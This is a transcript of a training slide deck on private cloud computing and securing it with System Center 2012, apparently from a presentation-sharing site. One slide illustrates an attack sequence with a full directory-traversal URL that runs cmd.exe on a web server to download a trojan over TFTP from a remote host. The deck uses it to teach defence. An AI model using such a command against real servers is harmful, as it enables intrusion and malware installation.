1 / 30

Securing The Cloud

Securing The Cloud. Kevin King - Senior Technical Instructor ● Infrastructructure /Cloud Consulting

talen
Télécharger la présentation

Securing The Cloud

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Securing The Cloud Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting | MCT CCSI MCSE-Private Cloud MCSA MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014 New Horizons CLC|  6700 Jefferson, Building A  |  Albuquerque, NM 87109 p: 505.830.7100 |f: 505.830.2239 | kking@nhabq.com | www.nhabq.com What is the Cloud? How do you lock it down?

  2. Introduction to the Private Cloud Securing the Private Cloud

  3. Overview • Overview of the Cloud Computing Model • Requirements for the Private Cloud • Operating a Private Cloud Infrastructure with System Center • Securing the Cloud

  4. 1) Overview of the Cloud Computing Model • The Advent of Cloud Computing • Public vs. Private Clouds • Cloud Service Models • Methods to Implement the Private Cloud • System Center 2012 and the Private Cloud

  5. The Advent of Cloud Computing Client/Server Architecture Cloud Computing Advantages of cloud computing include: Virtualized data center Reduced operational costs Server consolidation Improved resiliency and agility

  6. Public vs. Private Clouds Private cloud: Provides more control Is flexible Is customizable Has operational and management costs Public cloud: Provides less control Provides less flexibility Provides less customization Reduced operational and management costs

  7. Cloud Service Models The three cloud service models are: Infrastructure as a Service (IaaS) Includes server, storage, and network infrastructure Software as a Service (SaaS) Includes business processes and applications Platform as a Service (PaaS) Includes application execution services

  8. Methods to Implement the Private Cloud High Service Provider Level of Pre-integration Reference Architecture Custom Low Deployment Time Low High

  9. System Center 2012 and the Private Cloud System Center 2012 has the following components: • App Controller • Service Manager • Virtual Machine Manager (VMM) • Orchestrator • Operations Manager • Data Protection Manager (DPM) • Configuration Manager

  10. 2) Requirements for the Private Cloud • Key Business Requirements • Service Identification and Onboarding • Datacenter Administrators and Business Unit IT Administrators

  11. Key Business Requirements The key business requirements include: • Competitive advantage • Scalability • Reduced cost

  12. Service Identification and Onboarding • Service Identification: • Does the application need to reside in the same location as the data? • What computer resources are required? • What are the software or operating system requirements? • What network bandwidth will be required by the application between the users and the cloud? • Onboarding: • Has the service passed the identity check and is it ready for the cloud? • Have relevant backups taken place? • Has the migration been tested successfully in a pre-production or UAT environment? • Is there a documented method for fallback?

  13. Datacenter Administrators and Business Unit IT Administrators The datacenter administrator: Manages the physical infrastructure Manages the private cloud resources Datacenter Administrator Configures access to cloud resources The business unit IT administrator: Manages the business unit cloud Manages resources specific to the business unit cloud that they own Business Unit IT Administrator

  14. 3) Operating a Private Cloud Infrastructure with System Center • Provisioning the Private Cloud with Virtual Machine Manager • Managing Public and Private Clouds with App Controller • Service Management with Service Manager • Automating Data CenterProcesses with Orchestrator

  15. Provisioning the Private Cloud with Virtual Machine Manager • A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard:

  16. Managing Public and Private Clouds with App Controller Using the App Controller Portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform

  17. Service Management with Service Manager Service Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements By using Service Manager, you can: • Reduce mean time to resolution of issues through a self-service user experience • Improve private cloud efficiency through centralized management of change processes • Provide self-service provisioning of private cloud resources • Implement compliance controls for the management of the private cloud infrastructure

  18. Automating Data CenterProcesses with Orchestrator Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment By using Orchestrator, you can: • Automate processes in your private cloud • Improve operational efficiency • Connect different systems from different vendors without the knowledge of scripting languages

  19. 4) Securing the Private Cloud • Old days – security = planting two firewalls • Today – security = very complex problem

  20. Types of Attacks Including, but not limited to: • Packet sniffing— An application that uses the promiscuous mode of the network adapter to capture all networks packets. • IP spoofing— An attack in which a hacker assumes an IP address of others to conceal its true identity • Denial-of-service (DoS) attack— Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following: • Code Red • Blaster • Ping of Death • Trinity

  21. Types of attacks • Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force • Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method • Application attack— This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed • Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected • Blue Pilling

  22. Sequence of attacks • After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server • The hacker exploits the vulnerability to get a shell • For example: • Copy the Trojan on the web/application server: • HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

  23. Server Farm Security Strategies

  24. Segmenting the Server Farm

  25. Building the Firewall Ruleset

  26. From Physical Separation to Logical Separation

  27. Securing The Cloud System Center 2012 has the following components: • App Controller • Service Manager • Virtual Machine Manager (VMM) • Orchestrator • Operations Manager • Data Protection Manager (DPM) • Configuration Manager

  28. S U R F A C E A R E A

  29. Public vs. Private Clouds Physical: Physical access to equipment OOB Management Password Policy Host Security Logical: System Center Components Individual VMs Services and Apps Passwords/Encryption/Least Privledge

More Related